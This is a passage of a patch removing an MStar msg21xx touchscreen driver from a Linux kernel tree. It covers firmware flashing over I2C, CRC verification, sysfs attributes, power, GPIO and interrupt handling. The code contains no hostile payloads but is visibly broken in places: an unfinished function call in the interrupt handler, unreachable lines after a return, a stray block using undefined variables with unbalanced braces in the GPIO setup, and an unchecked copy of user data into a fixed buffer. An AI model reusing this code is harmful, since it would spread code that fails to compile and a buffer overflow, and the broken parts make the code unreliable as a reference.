-- msleep(100);
-- break;
-- }
--
-- /* polling 0x3CE4 is 0x2F43 */
-- do {
-- reg_data = read_reg(ts_data, 0x3C, 0xE4);
-- } while (reg_data != 0x2F43);
--
-- /* calculate CRC 32 */
-- _CRC_initTable();
--
-- /* total 32 KB : 2 byte per R/W */
-- for (i = 0; i < 32; i++) {
-- if (i == 31) {
-- fw_bin_data[i][1014] = 0x5A;
-- fw_bin_data[i][1015] = 0xA5;
--
-- for (j = 0; j < 1016; j++)
-- crc_main = _CRC_getValue(fw_bin_data[i][j],
-- crc_main);
-- } else {
-- for (j = 0; j < 1024; j++)
-- crc_main = _CRC_getValue(fw_bin_data[i][j],
-- crc_main);
-- }
--
-- for (j = 0; j < 8; j++)
-- write_i2c_seq(ts_data, ts_data->client->addr,
-- &fw_bin_data[i][j * 128], 128);
-- msleep(100);
--
-- /* polling 0x3CE4 is 0xD0BC */
-- do {
-- reg_data = read_reg(ts_data, 0x3C, 0xE4);
-- } while (reg_data != 0xD0BC);
--
-- write_reg(ts_data, 0x3C, 0xE4, 0x2F43);
-- }
--
-- if ((emem_type == EMEM_ALL) || (emem_type == EMEM_MAIN)) {
-- /* write file done and check crc */
-- write_reg(ts_data, 0x3C, 0xE4, 0x1380);
-- }
-- msleep(20);
--
-- if ((emem_type == EMEM_ALL) || (emem_type == EMEM_MAIN)) {
-- /* polling 0x3CE4 is 0x9432 */
-- do {
-- reg_data = read_reg(ts_data, 0x3C, 0xE4);
-- } while (reg_data != 0x9432);
-- }
--
-- crc_main = crc_main ^ 0xffffffff;
-- crc_info = crc_info ^ 0xffffffff;
--
-- if ((emem_type == EMEM_ALL) || (emem_type == EMEM_MAIN)) {
-- /* CRC Main from TP */
-- crc_main_tp = read_reg(ts_data, 0x3C, 0x80);
-- crc_main_tp = (crc_main_tp << 16) |
-- read_reg(ts_data, 0x3C, 0x82);
--
-- /* CRC Info from TP */
-- crc_info_tp = read_reg(ts_data, 0x3C, 0xA0);
-- crc_info_tp = (crc_info_tp << 16) |
-- read_reg(ts_data, 0x3C, 0xA2);
-- }
--
-- update_pass = 1;
-- if ((emem_type == EMEM_ALL) || (emem_type == EMEM_MAIN)) {
-- if (crc_main_tp != crc_main)
-- update_pass = 0;
-- }
--
-- if (!update_pass) {
-- dev_err(dev, "update_C33 failed\n");
-- msg21xx_reset_hw(ts_data->pdata);
-- return 0;
-- }
--
-- dev_dbg(dev, "update_C33 OK\n");
-- msg21xx_reset_hw(ts_data->pdata);
-- return size;
--}
--
--static unsigned int _CalMainCRC32(struct msg21xx_ts_data *ts_data)
--{
-- unsigned int ret = 0;
-- unsigned short reg_data = 0;
--
-- msg21xx_reset_hw(ts_data->pdata);
--
-- dbbusDWIICEnterSerialDebugMode(ts_data);
-- dbbusDWIICStopMCU(ts_data);
-- dbbusDWIICIICUseBus(ts_data);
-- dbbusDWIICIICReshape(ts_data);
-- msleep(100);
--
-- /* Stop MCU */
-- write_reg(ts_data, 0x0F, 0xE6, 0x0001);
--
-- /* Stop Watchdog */
-- write_reg_8bit(ts_data, 0x3C, 0x60, 0x55);
-- write_reg_8bit(ts_data, 0x3C, 0x61, 0xAA);
--
-- /* cmd */
-- write_reg(ts_data, 0x3C, 0xE4, 0xDF4C);
-- write_reg(ts_data, MSTAR_CHIPTOP_REGISTER_BANK, 0x04, 0x7d60);
-- /* TP SW reset */
-- write_reg(ts_data, MSTAR_CHIPTOP_REGISTER_BANK, 0x04, 0x829F);
--
-- /* MCU run */
-- write_reg(ts_data, 0x0F, 0xE6, 0x0000);
--
-- /* polling 0x3CE4 */
-- do {
-- reg_data = read_reg(ts_data, 0x3C, 0xE4);
-- } while (reg_data != 0x9432);
--
-- /* Cal CRC Main from TP */
-- ret = read_reg(ts_data, 0x3C, 0x80);
-- ret = (ret << 16) | read_reg(ts_data, 0x3C, 0x82);
--
-- dev_dbg(&ts_data->client->dev,
-- "[21xxA]:Current main crc32=0x%x\n", ret);
-- return ret;
--}
--
--static void _ReadBinConfig(struct msg21xx_ts_data *ts_data)
--{
-- unsigned char dbbus_tx_data[5] = {0};
-- unsigned char dbbus_rx_data[4] = {0};
-- unsigned short reg_data = 0;
--
-- msg21xx_reset_hw(ts_data->pdata);
--
-- dbbusDWIICEnterSerialDebugMode(ts_data);
-- dbbusDWIICStopMCU(ts_data);
-- dbbusDWIICIICUseBus(ts_data);
-- dbbusDWIICIICReshape(ts_data);
-- msleep(100);
--
-- /* Stop MCU */
-- write_reg(ts_data, 0x0F, 0xE6, 0x0001);
--
-- /* Stop Watchdog */
-- write_reg_8bit(ts_data, 0x3C, 0x60, 0x55);
-- write_reg_8bit(ts_data, 0x3C, 0x61, 0xAA);
--
-- /* cmd */
-- write_reg(ts_data, 0x3C, 0xE4, 0xA4AB);
-- write_reg(ts_data, MSTAR_CHIPTOP_REGISTER_BANK, 0x04, 0x7d60);
--
-- /* TP SW reset */
-- write_reg(ts_data, MSTAR_CHIPTOP_REGISTER_BANK, 0x04, 0x829F);
--
-- /* MCU run */
-- write_reg(ts_data, 0x0F, 0xE6, 0x0000);
--
-- /* polling 0x3CE4 */
-- do {
-- reg_data = read_reg(ts_data, 0x3C, 0xE4);
-- } while (reg_data != 0x5B58);
--
-- dbbus_tx_data[0] = 0x72;
-- dbbus_tx_data[1] = 0x7F;
-- dbbus_tx_data[2] = 0x55;
-- dbbus_tx_data[3] = 0x00;
-- dbbus_tx_data[4] = 0x04;
-- write_i2c_seq(ts_data, ts_data->client->addr, &dbbus_tx_data[0], 5);
-- read_i2c_seq(ts_data, ts_data->client->addr, &dbbus_rx_data[0], 4);
-- if ((dbbus_rx_data[0] >= 0x30 && dbbus_rx_data[0] <= 0x39)
-- && (dbbus_rx_data[1] >= 0x30 && dbbus_rx_data[1] <= 0x39)
-- && (dbbus_rx_data[2] >= 0x31 && dbbus_rx_data[2] <= 0x39)) {
-- main_sw_id = (dbbus_rx_data[0] - 0x30) * 100 +
-- (dbbus_rx_data[1] - 0x30) * 10 +
-- (dbbus_rx_data[2] - 0x30);
-- }
--
-- dbbus_tx_data[0] = 0x72;
-- dbbus_tx_data[1] = 0x7F;
-- dbbus_tx_data[2] = 0xFC;
-- dbbus_tx_data[3] = 0x00;
-- dbbus_tx_data[4] = 0x04;
-- write_i2c_seq(ts_data, ts_data->client->addr, &dbbus_tx_data[0], 5);
-- read_i2c_seq(ts_data, ts_data->client->addr, &dbbus_rx_data[0], 4);
-- bin_conf_crc32 = (dbbus_rx_data[0] << 24) |
-- (dbbus_rx_data[1] << 16) |
-- (dbbus_rx_data[2] << 8) |
-- (dbbus_rx_data[3]);
--
-- dbbus_tx_data[0] = 0x72;
-- dbbus_tx_data[1] = 0x83;
-- dbbus_tx_data[2] = 0x00;
-- dbbus_tx_data[3] = 0x00;
-- dbbus_tx_data[4] = 0x04;
-- write_i2c_seq(ts_data, ts_data->client->addr, &dbbus_tx_data[0], 5);
-- read_i2c_seq(ts_data, ts_data->client->addr, &dbbus_rx_data[0], 4);
-- if ((dbbus_rx_data[0] >= 0x30 && dbbus_rx_data[0] <= 0x39)
-- && (dbbus_rx_data[1] >= 0x30 && dbbus_rx_data[1] <= 0x39)
-- && (dbbus_rx_data[2] >= 0x31 && dbbus_rx_data[2] <= 0x39)) {
-- info_sw_id = (dbbus_rx_data[0] - 0x30) * 100 +
-- (dbbus_rx_data[1] - 0x30) * 10 +
-- (dbbus_rx_data[2] - 0x30);
-- }
--
-- dev_dbg(&ts_data->client->dev,
-- "[21xxA]:main_sw_id = %d, info_sw_id = %d, bin_conf_crc32 = 0x%x\n",
-- main_sw_id, info_sw_id, bin_conf_crc32);
--}
--
--static ssize_t firmware_update_show(struct device *dev,
-- struct device_attribute *attr,
-- char *buf)
--{
-- struct msg21xx_ts_data *ts_data = dev_get_drvdata(dev);
--
-- return snprintf(buf, 3, "%d\n", ts_data->pdata->updating_fw);
--}
--
--static ssize_t firmware_update_store(struct device *dev,
-- struct device_attribute *attr,
-- const char *buf,
-- size_t size)
--{
-- struct msg21xx_ts_data *ts_data = dev_get_drvdata(dev);
--
-- ts_data->pdata->updating_fw = true;
-- disable_irq(ts_data->client->irq);
--
-- size = firmware_update_c33(dev, attr, buf, size, EMEM_MAIN, false);
--
-- enable_irq(ts_data->client->irq);
-- ts_data->pdata->updating_fw = false;
--
-- return size;
--}
--
--static DEVICE_ATTR(update, (S_IRUGO | S_IWUSR),
-- firmware_update_show,
-- firmware_update_store);
--
--static int prepare_fw_data(struct device *dev)
--{
-- int count;
-- int i;
-- int ret;
-- const struct firmware *fw = NULL;
-- struct msg21xx_ts_data *ts_data = dev_get_drvdata(dev);
--
-- ret = request_firmware(&fw, ts_data->pdata->fw_name, dev);
-- if (ret < 0) {
-- dev_err(dev, "Request firmware failed - %s (%d)\n",
-- ts_data->pdata->fw_name, ret);
-- return ret;
-- }
--
-- count = fw->size / 1024;
--
-- for (i = 0; i < count; i++)
-- memcpy(fw_bin_data[i], fw->data + (i * 1024), 1024);
--
-- fw_file_major = MSG_FW_FILE_MAJOR_VERSION(fw);
-- fw_file_minor = MSG_FW_FILE_MINOR_VERSION(fw);
-- dev_dbg(dev, "New firmware: %d.%d",
-- fw_file_major, fw_file_minor);
--
-- return fw->size;
--}
--
--static ssize_t firmware_update_smart_store(struct device *dev,
-- struct device_attribute *attr,
-- const char *buf,
-- size_t size)
--{
-- int ret;
-- struct msg21xx_ts_data *ts_data = dev_get_drvdata(dev);
--
-- ret = prepare_fw_data(dev);
-- if (ret < 0) {
-- dev_err(dev, "Request firmware failed -(%d)\n", ret);
-- return ret;
-- }
-- ts_data->pdata->updating_fw = true;
-- disable_irq(ts_data->client->irq);
--
-- ret = firmware_update_c33(dev, attr, buf, size, EMEM_MAIN, false);
-- if (ret == 0)
-- dev_err(dev, "firmware_update_c33 ret = %d\n", ret);
--
-- enable_irq(ts_data->client->irq);
-- ts_data->pdata->updating_fw = false;
--
-- return ret;
--}
--
--static ssize_t firmware_force_update_smart_store(struct device *dev,
-- struct device_attribute *attr,
-- const char *buf,
-- size_t size)
--{
-- int ret;
-- struct msg21xx_ts_data *ts_data = dev_get_drvdata(dev);
--
-- ret = prepare_fw_data(dev);
-- if (ret < 0) {
-- dev_err(dev, "Request firmware failed -(%d)\n", ret);
-- return ret;
-- }
-- ts_data->pdata->updating_fw = true;
-- disable_irq(ts_data->client->irq);
--
-- ret = firmware_update_c33(dev, attr, buf, size, EMEM_MAIN, true);
-- if (ret == 0)
-- dev_err(dev, "firmware_update_c33 et = %d\n", ret);
--
-- enable_irq(ts_data->client->irq);
-- ts_data->pdata->updating_fw = false;
--
-- return ret;
--}
--
--static DEVICE_ATTR(update_fw, (S_IRUGO | S_IWUSR),
-- firmware_update_show,
-- firmware_update_smart_store);
--
--static DEVICE_ATTR(force_update_fw, (S_IRUGO | S_IWUSR),
-- firmware_update_show,
-- firmware_force_update_smart_store);
--
--static ssize_t firmware_version_show(struct device *dev,
-- struct device_attribute *attr,
-- char *buf)
--{
-- struct msg21xx_ts_data *ts_data = dev_get_drvdata(dev);
--
-- msg21xx_read_firmware_id(ts_data);
-- return snprintf(buf, sizeof(char) * 8, "%03d%03d\n",
-- ts_data->pdata->fw_version_major,
-- ts_data->pdata->fw_version_minor);
--}
--
--static DEVICE_ATTR(version, S_IRUGO,
-- firmware_version_show,
-- NULL);
--
--
--static ssize_t msg21xx_fw_name_show(struct device *dev,
-- struct device_attribute *attr, char *buf)
--{
-- struct msg21xx_ts_data *ts_data = dev_get_drvdata(dev);
--
-- return snprintf(buf, MSTAR_FW_NAME_MAX_LEN - 1,
-- "%s\n", ts_data->pdata->fw_name);
--}
--
--static ssize_t msg21xx_fw_name_store(struct device *dev,
-- struct device_attribute *attr,
-- const char *buf, size_t size)
--{
-- struct msg21xx_ts_data *ts_data = dev_get_drvdata(dev);
--
-- if (size > MSTAR_FW_NAME_MAX_LEN - 1)
-- return -EINVAL;
--
-- strlcpy(ts_data->pdata->fw_name, buf, size);
-- if (ts_data->pdata->fw_name[size - 1] == '\n')
-- ts_data->pdata->fw_name[size - 1] = 0;
--
-- return size;
--}
--
--static DEVICE_ATTR(fw_name, (S_IRUGO | S_IWUSR),
-- msg21xx_fw_name_show, msg21xx_fw_name_store);
--
--static ssize_t firmware_data_store(struct device *dev,
-- struct device_attribute *attr,
-- const char *buf,
-- size_t size)
--{
-- int count = size / 1024;
-- int i;
--
-- for (i = 0; i < count; i++)
-- memcpy(fw_bin_data[i], buf + (i * 1024), 1024);
--
-- if (buf != NULL)
-- dev_dbg(dev, "buf[0] = %c\n", buf[0]);
--
-- return size;
--}
--
--static DEVICE_ATTR(data, S_IWUSR, NULL, firmware_data_store);
--
--static ssize_t tp_print_show(struct device *dev,
-- struct device_attribute *attr,
-- char *buf)
--{
-- struct msg21xx_ts_data *ts_data = dev_get_drvdata(dev);
--
-- tp_print_proc_read(ts_data);
--
-- return snprintf(buf, 3, "%d\n", ts_data->suspended);
--}
--
--static ssize_t tp_print_store(struct device *dev,
-- struct device_attribute *attr,
-- const char *buf,
-- size_t size)
--{
-- return size;
--}
--
--static DEVICE_ATTR(tpp, (S_IRUGO | S_IWUSR),
-- tp_print_show, tp_print_store);
--
--#ifdef CONFIG_TOUCHSCREEN_PROXIMITY_SENSOR
--static void _msg_enable_proximity(void)
--{
-- unsigned char tx_data[4] = {0};
--
-- tx_data[0] = 0x52;
-- tx_data[1] = 0x00;
-- tx_data[2] = 0x47;
-- tx_data[3] = 0xa0;
-- mutex_lock(&msg21xx_mutex);
-- write_i2c_seq(ts_data->client->addr, &tx_data[0], 4);
-- mutex_unlock(&msg21xx_mutex);
--
-- bEnableTpProximity = 1;
--}
--
--static void _msg_disable_proximity(void)
--{
-- unsigned char tx_data[4] = {0};
--
-- tx_data[0] = 0x52;
-- tx_data[1] = 0x00;
-- tx_data[2] = 0x47;
-- tx_data[3] = 0xa1;
-- mutex_lock(&msg21xx_mutex);
-- write_i2c_seq(ts_data->client->addr, &tx_data[0], 4);
-- mutex_unlock(&msg21xx_mutex);
--
-- bEnableTpProximity = 0;
-- bFaceClosingTp = 0;
--}
--
--static void tsps_msg21xx_enable(int en)
--{
-- if (en)
-- _msg_enable_proximity();
-- else
-- _msg_disable_proximity();
--}
--
--static int tsps_msg21xx_data(void)
--{
-- return bFaceClosingTp;
--}
--#endif
--
--static int msg21xx_pinctrl_init(struct msg21xx_ts_data *ts_data)
--{
-- int retval;
--
-- /* Get pinctrl if target uses pinctrl */
-- ts_data->ts_pinctrl = devm_pinctrl_get(&(ts_data->client->dev));
-- if (IS_ERR_OR_NULL(ts_data->ts_pinctrl)) {
-- retval = PTR_ERR(ts_data->ts_pinctrl);
-- dev_dbg(&ts_data->client->dev,
-- "Target does not use pinctrl %d\n", retval);
-- goto err_pinctrl_get;
-- }
--
-- ts_data->pinctrl_state_active = pinctrl_lookup_state(
-- ts_data->ts_pinctrl, PINCTRL_STATE_ACTIVE);
-- if (IS_ERR_OR_NULL(ts_data->pinctrl_state_active)) {
-- retval = PTR_ERR(ts_data->pinctrl_state_active);
-- dev_dbg(&ts_data->client->dev,
-- "Can't lookup %s pinstate %d\n",
-- PINCTRL_STATE_ACTIVE, retval);
-- goto err_pinctrl_lookup;
-- }
--
-- ts_data->pinctrl_state_suspend = pinctrl_lookup_state(
-- ts_data->ts_pinctrl, PINCTRL_STATE_SUSPEND);
-- if (IS_ERR_OR_NULL(ts_data->pinctrl_state_suspend)) {
-- retval = PTR_ERR(ts_data->pinctrl_state_suspend);
-- dev_dbg(&ts_data->client->dev,
-- "Can't lookup %s pinstate %d\n",
-- PINCTRL_STATE_SUSPEND, retval);
-- goto err_pinctrl_lookup;
-- }
--
-- ts_data->pinctrl_state_release = pinctrl_lookup_state(
-- ts_data->ts_pinctrl, PINCTRL_STATE_RELEASE);
-- if (IS_ERR_OR_NULL(ts_data->pinctrl_state_release)) {
-- retval = PTR_ERR(ts_data->pinctrl_state_release);
-- dev_dbg(&ts_data->client->dev,
-- "Can't lookup %s pinstate %d\n",
-- PINCTRL_STATE_RELEASE, retval);
-- }
--
-- return 0;
--
--err_pinctrl_lookup:
-- devm_pinctrl_put(ts_data->ts_pinctrl);
--err_pinctrl_get:
-- ts_data->ts_pinctrl = NULL;
-- return retval;
--}
--
--static unsigned char calculate_checksum(unsigned char *msg, int length)
--{
-- int checksum = 0, i;
--
-- for (i = 0; i < length; i++)
-- checksum += msg[i];
--
-- return (unsigned char)((-checksum) & 0xFF);
--}
--
--static int parse_info(struct msg21xx_ts_data *ts_data)
--{
-- unsigned char data[DEMO_MODE_PACKET_LENGTH] = {0};
-- unsigned char checksum = 0;
-- unsigned int x = 0, y = 0;
-- unsigned int x2 = 0, y2 = 0;
-- unsigned int delta_x = 0, delta_y = 0;
--
-- mutex_lock(&msg21xx_mutex);
-- read_i2c_seq(ts_data, ts_data->client->addr, &data[0],
-- DEMO_MODE_PACKET_LENGTH);
-- mutex_unlock(&msg21xx_mutex);
-- checksum = calculate_checksum(&data[0], (DEMO_MODE_PACKET_LENGTH-1));
-- dev_dbg(&ts_data->client->dev, "check sum: [%x] == [%x]?\n",
-- data[DEMO_MODE_PACKET_LENGTH-1], checksum);
--
-- if (data[DEMO_MODE_PACKET_LENGTH-1] != checksum) {
-- dev_err(&ts_data->client->dev, "WRONG CHECKSUM\n");
-- return -EINVAL;
-- }
--
-- if (data[0] != 0x52) {
-- dev_err(&ts_data->client->dev, "WRONG HEADER\n");
-- return -EINVAL;
-- }
--
-- ts_data->info.keycode = 0xFF;
-- if ((data[1] == 0xFF) && (data[2] == 0xFF) &&
-- (data[3] == 0xFF) && (data[4] == 0xFF) &&
-- (data[6] == 0xFF)) {
-- if ((data[5] == 0xFF) || (data[5] == 0)) {
-- ts_data->info.keycode = 0xFF;
-- } else if ((data[5] == 1) || (data[5] == 2) ||
-- (data[5] == 4) || (data[5] == 8)) {
-- ts_data->info.keycode = data[5] >> 1;
--
-- dev_dbg(&ts_data->client->dev,
-- "ts_data->info.keycode index %d\n",
-- ts_data->info.keycode);
-- }
-- #ifdef CONFIG_TOUCHSCREEN_PROXIMITY_SENSOR
-- else if (bEnableTpProximity && ((data[5] == 0x80) ||
-- (data[5] == 0x40))) {
-- if (data[5] == 0x80)
-- bFaceClosingTp = 1;
-- else if (data[5] == 0x40)
-- bFaceClosingTp = 0;
--
-- return -EINVAL;
-- }
-- #endif
-- else {
-- dev_err(&ts_data->client->dev, "WRONG KEY\n");
-- return -EINVAL;
-- }
-- } else {
-- x = (((data[1] & 0xF0) << 4) | data[2]);
-- y = (((data[1] & 0x0F) << 8) | data[3]);
-- delta_x = (((data[4] & 0xF0) << 4) | data[5]);
-- delta_y = (((data[4] & 0x0F) << 8) | data[6]);
--
-- if ((delta_x == 0) && (delta_y == 0)) {
-- ts_data->info.point[0].x =
-- x * ts_data->pdata->x_max / TPD_WIDTH;
-- ts_data->info.point[0].y =
-- y * ts_data->pdata->y_max / TPD_HEIGHT;
-- ts_data->info.count = 1;
-- } else {
-- if (delta_x > 2048)
-- delta_x -= 4096;
--
-- if (delta_y > 2048)
-- delta_y -= 4096;
--
-- x2 = (unsigned int)((signed short)x +
-- (signed short)delta_x);
-- y2 = (unsigned int)((signed short)y +
-- (signed short)delta_y);
-- ts_data->info.point[0].x =
-- x * ts_data->pdata->x_max / TPD_WIDTH;
-- ts_data->info.point[0].y =
-- y * ts_data->pdata->y_max / TPD_HEIGHT;
-- ts_data->info.point[1].x =
-- x2 * ts_data->pdata->x_max / TPD_WIDTH;
-- ts_data->info.point[1].y =
-- y2 * ts_data->pdata->y_max / TPD_HEIGHT;
-- ts_data->info.count = ts_data->pdata->num_max_touches;
-- }
-- }
--
-- return 0;
--}
--
--static void touch_driver_touch_released(struct msg21xx_ts_data *ts_data)
--{
-- int i;
--
-- for (i = 0; i < ts_data->pdata->num_max_touches; i++) {
-- input_mt_slot(ts_data->input_dev, i);
-- input_mt_report_slot_state(ts_data->input_dev,
-- MT_TOOL_FINGER, 0);
-- }
--
-- input_report_key(ts_data->input_dev, BTN_TOUCH, 0);
-- input_report_key(ts_data->input_dev, BTN_TOOL_FINGER, 0);
-- input_sync(ts_data->input_dev);
--}
--
--/* read data through I2C then report data to input
-- *sub-system when interrupt occurred
-- */
--static irqreturn_t msg21xx_ts_interrupt(int irq, void *dev_id)
--{
-- int i = 0;
-- static int last_keycode = 0xFF;
-- static int last_count;
-- struct msg21xx_ts_data *ts_data = dev_id;
--
-- ts_data->info.count = 0;
-- if (parse_info(ts_data) == 0) {
-- if (ts_data->info.keycode != 0xFF) { /* key touch pressed */
-- if (ts_data->info.keycode <
-- ts_data->pdata->num_buttons) {
-- if (ts_data->info.keycode != last_keycode) {
-- dev_dbg(&ts_data->client->dev,
-- "key touch pressed");
--
-- input_report_key(ts_data->input_dev,
-- BTN_TOUCH, 1);
-- input_report_key(ts_data->input_dev,
-- ts_data->pdata->button_map[
-- ts_data->info.keycode], 1);
--
-- last_keycode = ts_data->info.keycode;
-- } else {
-- /* pass duplicate key-pressing */
-- dev_dbg(&ts_data->client->dev,
-- "REPEATED KEY\n");
-- }
-- } else {
-- dev_dbg(&ts_data->client->dev, "WRONG KEY\n");
-- }
-- } else { /* key touch released */
-- if (last_keycode != 0xFF) {
-- dev_dbg(&ts_data->client->dev, "key touch released");
--
-- input_report_key(ts_data->input_dev,
-- BTN_TOUCH, 0);
-- input_report_key(ts_data->input_dev,
-- ts_data->pdata->button_map[last_keycode],
-- 0);
--
-- last_keycode = 0xFF;
-- }
-- }
--
-- if (ts_data->info.count > 0) { /* point touch pressed */
-- for (i = 0; i < ts_data->info.count; i++) {
-- input_mt_slot(ts_data->input_dev, i);
-- input_mt_report_slot_state(ts_data->input_dev,
-- MT_TOOL_FINGER, 1);
-- input_report_abs(ts_data->input_dev,
-- ABS_MT_TOUCH_MAJOR, 1);
-- input_report_abs(ts_data->input_dev,
-- ABS_MT_POSITION_X,
-- ts_data->info.point[i].x);
-- input_report_abs(ts_data->input_dev,
-- ABS_MT_POSITION_Y,
-- ts_data->info.point[i].y);
-- }
-- }
--
-- if (last_count > info.count) {
-- for (i = info.count; i < MAX_TOUCH_NUM; i++) {
-- input_mt_slot(input_dev, i);
-- input_mt_report_slot_state(input_dev,
-- }
--
-- if (last_count > ts_data->info.count) {
-- for (i = ts_data->info.count;
-- i < ts_data->pdata->num_max_touches;
-- i++) {
-- input_mt_slot(ts_data->input_dev, i);
-- input_mt_report_slot_state(ts_data->input_dev,
-- MT_TOOL_FINGER, 0);
-- }
-- }
-- last_count = ts_data->info.count;
--
-- input_report_key(ts_data->input_dev, BTN_TOUCH,
-- ts_data->info.count > 0);
-- input_report_key(ts_data->input_dev, BTN_TOOL_FINGER,
-- ts_data->info.count > 0);
--
-- input_sync(ts_data->input_dev);
-- }
--
-- return IRQ_HANDLED;
--}
--
--static int msg21xx_ts_power_init(struct msg21xx_ts_data *ts_data, bool init)
--{
-- int rc;
--
-- if (init) {
-- ts_data->vdd = regulator_get(&ts_data->client->dev,
-- "vdd");
-- if (IS_ERR(ts_data->vdd)) {
-- rc = PTR_ERR(ts_data->vdd);
-- dev_err(&ts_data->client->dev,
-- "Regulator get failed vdd rc=%d\n", rc);
-- return rc;
-- }
--
-- if (regulator_count_voltages(ts_data->vdd) > 0) {
-- rc = regulator_set_voltage(ts_data->vdd,
-- MSTAR_VTG_MIN_UV,
-- MSTAR_VTG_MAX_UV);
-- if (rc) {
-- dev_err(&ts_data->client->dev,
-- "Regulator set_vtg failed vdd rc=%d\n",
-- rc);
-- goto reg_vdd_put;
-- }
-- }
--
-- ts_data->vcc_i2c = regulator_get(&ts_data->client->dev,
-- "vcc_i2c");
-- if (IS_ERR(ts_data->vcc_i2c)) {
-- rc = PTR_ERR(ts_data->vcc_i2c);
-- dev_err(&ts_data->client->dev,
-- "Regulator get failed vcc_i2c rc=%d\n", rc);
-- goto reg_vdd_set_vtg;
-- }
--
-- if (regulator_count_voltages(ts_data->vcc_i2c) > 0) {
-- rc = regulator_set_voltage(ts_data->vcc_i2c,
-- MSTAR_I2C_VTG_MIN_UV,
-- MSTAR_I2C_VTG_MAX_UV);
-- if (rc) {
-- dev_err(&ts_data->client->dev,
-- "Regulator set_vtg failed vcc_i2c rc=%d\n", rc);
-- goto reg_vcc_i2c_put;
-- }
-- }
-- } else {
-- if (regulator_count_voltages(ts_data->vdd) > 0)
-- regulator_set_voltage(ts_data->vdd, 0,
-- MSTAR_VTG_MAX_UV);
--
-- regulator_put(ts_data->vdd);
--
-- if (regulator_count_voltages(ts_data->vcc_i2c) > 0)
-- regulator_set_voltage(ts_data->vcc_i2c, 0,
-- MSTAR_I2C_VTG_MAX_UV);
--
-- regulator_put(ts_data->vcc_i2c);
-- }
--
-- return 0;
--
--reg_vcc_i2c_put:
-- regulator_put(ts_data->vcc_i2c);
--reg_vdd_set_vtg:
-- if (regulator_count_voltages(ts_data->vdd) > 0)
-- regulator_set_voltage(ts_data->vdd, 0, MSTAR_VTG_MAX_UV);
--reg_vdd_put:
-- regulator_put(ts_data->vdd);
-- return rc;
--}
--
--static int msg21xx_ts_power_on(struct msg21xx_ts_data *ts_data, bool on)
--{
-- int rc;
--
-- if (!on)
-- goto power_off;
--
-- rc = regulator_enable(ts_data->vdd);
-- if (rc) {
-- dev_err(&ts_data->client->dev,
-- "Regulator vdd enable failed rc=%d\n", rc);
-- return rc;
-- }
--
-- rc = regulator_enable(ts_data->vcc_i2c);
-- if (rc) {
-- dev_err(&ts_data->client->dev,
-- "Regulator vcc_i2c enable failed rc=%d\n", rc);
-- regulator_disable(ts_data->vdd);
-- }
--
-- return rc;
--
-- DBG("*** %s ***\n", __func__);
-- rc = regulator_disable(vdd);
--power_off:
-- rc = regulator_disable(ts_data->vdd);
-- if (rc) {
-- dev_err(&ts_data->client->dev,
-- "Regulator vdd disable failed rc=%d\n", rc);
-- return rc;
-- }
--
-- rc = regulator_disable(ts_data->vcc_i2c);
-- if (rc) {
-- dev_err(&ts_data->client->dev,
-- "Regulator vcc_i2c disable failed rc=%d\n", rc);
-- rc = regulator_enable(ts_data->vdd);
-- }
--
-- return rc;
--}
--
--static int msg21xx_ts_gpio_configure(struct msg21xx_ts_data *ts_data, bool on)
--{
-- int ret = 0;
--
-- if (!on)
-- goto pwr_deinit;
--
-- if (gpio_is_valid(ts_data->pdata->irq_gpio)) {
-- ret = gpio_request(ts_data->pdata->irq_gpio,
-- "msg21xx_irq_gpio");
-- if (ret) {
-- dev_err(&ts_data->client->dev,
-- "Failed to request GPIO[%d], %d\n",
-- ts_data->pdata->irq_gpio, ret);
-- goto err_irq_gpio_req;
-- }
-- ret = gpio_direction_input(ts_data->pdata->irq_gpio);
-- if (ret) {
-- dev_err(&ts_data->client->dev,
-- "Failed to set direction for gpio[%d], %d\n",
-- ts_data->pdata->irq_gpio, ret);
-- goto err_irq_gpio_dir;
-- }
-- gpio_set_value_cansleep(ts_data->pdata->irq_gpio, 1);
-- } else {
-- dev_err(&ts_data->client->dev, "irq gpio not provided\n");
-- goto err_irq_gpio_req;
-- }
--
-- if (gpio_is_valid(ts_data->pdata->reset_gpio)) {
-- ret = gpio_request(ts_data->pdata->reset_gpio,
-- "msg21xx_reset_gpio");
-- if (ret) {
-- dev_err(&ts_data->client->dev,
-- "Failed to request GPIO[%d], %d\n",
-- ts_data->pdata->reset_gpio, ret);
-- goto err_reset_gpio_req;
-- }
--
-- } else {
-- if (gpio_is_valid(pdata->irq_gpio))
-- gpio_free(pdata->irq_gpio);
-- if (gpio_is_valid(pdata->reset_gpio)) {
-- gpio_set_value_cansleep(pdata->reset_gpio, 0);
-- ret = gpio_direction_input(pdata->reset_gpio);
-- if (ret)
-- dev_err(&i2c_client->dev,
-- "Unable to set direction for gpio [%d]\n",
-- pdata->reset_gpio);
-- gpio_free(pdata->reset_gpio);
-- }
-- }
-- return 0;
-- /* power on TP */
-- ret = gpio_direction_output(
-- ts_data->pdata->reset_gpio, 1);
-- if (ret) {
-- dev_err(&ts_data->client->dev,
-- "Failed to set direction for GPIO[%d], %d\n",
-- ts_data->pdata->reset_gpio, ret);
-- goto err_reset_gpio_dir;
-- }
-- msleep(100);
-- gpio_set_value_cansleep(ts_data->pdata->reset_gpio, 0);
-- msleep(20);
-- gpio_set_value_cansleep(ts_data->pdata->reset_gpio, 1);
-- msleep(200);
-- } else {
-- dev_err(&ts_data->client->dev, "reset gpio not provided\n");
-- goto err_reset_gpio_req;
-- }
--
-- return 0;
--
--err_reset_gpio_dir:
-- if (gpio_is_valid(ts_data->pdata->reset_gpio))
-- gpio_free(ts_data->pdata->irq_gpio);
--err_reset_gpio_req:
--err_irq_gpio_dir:
-- if (gpio_is_valid(ts_data->pdata->irq_gpio))
-- gpio_free(ts_data->pdata->irq_gpio);
--err_irq_gpio_req:
-- return ret;
--
--pwr_deinit:
-- if (gpio_is_valid(ts_data->pdata->irq_gpio))
-- gpio_free(ts_data->pdata->irq_gpio);
-- if (gpio_is_valid(ts_data->pdata->reset_gpio)) {
-- gpio_set_value_cansleep(ts_data->pdata->reset_gpio, 0);
-- ret = gpio_direction_input(ts_data->pdata->reset_gpio);
-- if (ret)
-- dev_err(&ts_data->client->dev,
-- "Unable to set direction for gpio [%d]\n",
-- ts_data->pdata->reset_gpio);
-- gpio_free(ts_data->pdata->reset_gpio);
-- }
-- return 0;
--}
--
--#ifdef CONFIG_PM
--static int msg21xx_ts_resume(struct device *dev)
--{
-- int retval;
-- struct msg21xx_ts_data *ts_data = dev_get_drvdata(dev);
--
-- if (!ts_data->suspended) {
-- dev_info(dev, "msg21xx_ts already in resume\n");
-- return 0;
-- }
--
-- mutex_lock(&ts_data->ts_mutex);
--
